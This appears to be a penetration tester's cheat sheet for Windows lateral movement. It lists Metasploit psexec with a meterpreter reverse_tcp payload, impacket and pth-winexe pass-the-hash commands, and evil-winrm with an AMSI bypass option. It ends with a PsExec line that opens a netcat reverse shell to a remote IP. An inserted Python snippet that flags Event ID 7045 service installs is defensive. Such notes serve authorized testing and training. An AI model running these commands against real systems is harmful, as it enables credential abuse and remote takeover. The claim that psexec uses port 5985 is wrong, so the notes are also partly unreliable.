privesc tools
check whether Windows logon credentials are working
msf
use exploit/windows/smb/psexec
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show targets
set TARGET X
use exploit/windows/smb/psexec_psh
Note: psexec and evil-winrm use port 5985 (PowerShell remote access)
psexec | smbexec | wmiexec
NOTE: psexec and smbexec give a SYSTEM shell; wmiexec gives a shell as the authenticating user.
# PASS is optional when passing the hash
impacket-psexec DOMAIN/USER[:PASS]@IP [-hashes :NTLMHASH]
impacket-smbexec DOMAIN/USER[:PASS]@IP [-hashes :NTLMHASH]
impacket-wmiexec DOMAIN/USER[:PASS]@IP [-hashes :NTLMHASH]
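Defender-side view of the note above, as an added example that is not part of the original notes: the SYSTEM shell comes from a service that psexec/smbexec install on the target, which leaves a System-log Event ID 7045 ("a service was installed") record. This Python scans constructed sample records for those service-install artefacts; the field names, sample values and the three heuristics are assumptions of this example, not a vendor rule set.

```python
import re

# Constructed sample records modelled on Event ID 7045 data fields.
# Real input would come from the System EVTX channel or a SIEM export.
SAMPLE_7045 = [
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat",
     "AccountName": "LocalSystem"},
    {"ServiceName": "xgYhQwLp", "ImagePath": r"%systemroot%\vXnKqTrs.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "wuauserv",
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
     "AccountName": "LocalSystem"},
]

# Heuristic (assumption): a service binary dropped directly into %SystemRoot%
# rather than under system32 is unusual for legitimate services.
EXE_IN_ROOT = re.compile(r"^%systemroot%\\[A-Za-z]{4,12}\.exe$", re.IGNORECASE)


def classify_service_install(rec):
    """Return the reasons a 7045 record looks like a remote-exec service install."""
    reasons = []
    name, path = rec.get("ServiceName", ""), rec.get("ImagePath", "")
    if name.upper() == "PSEXESVC":
        reasons.append("psexec-service-name")        # Sysinternals PsExec default name
    if "%COMSPEC%" in path.upper() and "ECHO" in path.upper():
        reasons.append("shell-command-as-service")   # smbexec-style: cmd.exe runs the command
    if EXE_IN_ROOT.match(path):
        reasons.append("exe-directly-in-systemroot")  # dropped binary, impacket psexec-style
    if reasons and rec.get("AccountName") == "LocalSystem":
        reasons.append("runs-as-system")             # why the resulting shell is SYSTEM
    return reasons


def scan(records):
    """Return {ServiceName: reasons} for records that trigger at least one heuristic."""
    hits = {}
    for rec in records:
        reasons = classify_service_install(rec)
        if reasons:
            hits[rec["ServiceName"]] = reasons
    return hits


if __name__ == "__main__":
    for svc, why in scan(SAMPLE_7045).items():
        print(f"{svc}: {', '.join(why)}")
```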
evil-winrm
NOTE: evil-winrm usually gives a medium-integrity shell for newly added administrator accounts. Even if the new account has Administrator permissions, you cannot actually perform administrative actions with it.
# only USER is needed, no DOMAIN
evil-winrm -i IP -u USER [-H NT-HASH | -p PASS]
# custom options
PS> menu
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
winexe
winexe -U 'DOMAIN/USER%PASS' //IP cmd.exe
pth-winexe
pth-winexe -U 'DOMAIN/USER%HASH' //IP cmd.exe
# --system needs local admin hash
pth-winexe [--system] -U 'administrator%NTLM:HASH' //IP cmd.exe
PsExec.exe
PS> .\PsExec64.exe -accepteula -i -s SHELL.exe
# i: Run process interactively
# s: Run remote process in the System account.
PS> .\PsExec64.exe -i -u "nt authority\local service" SHELL.exe
# u: Run process as the specified user account
# Run executable with a different user:pass
PS> .\PsExec.exe -accepteula -u USER -p PASS nc.exe IP PORT -e cmd.exe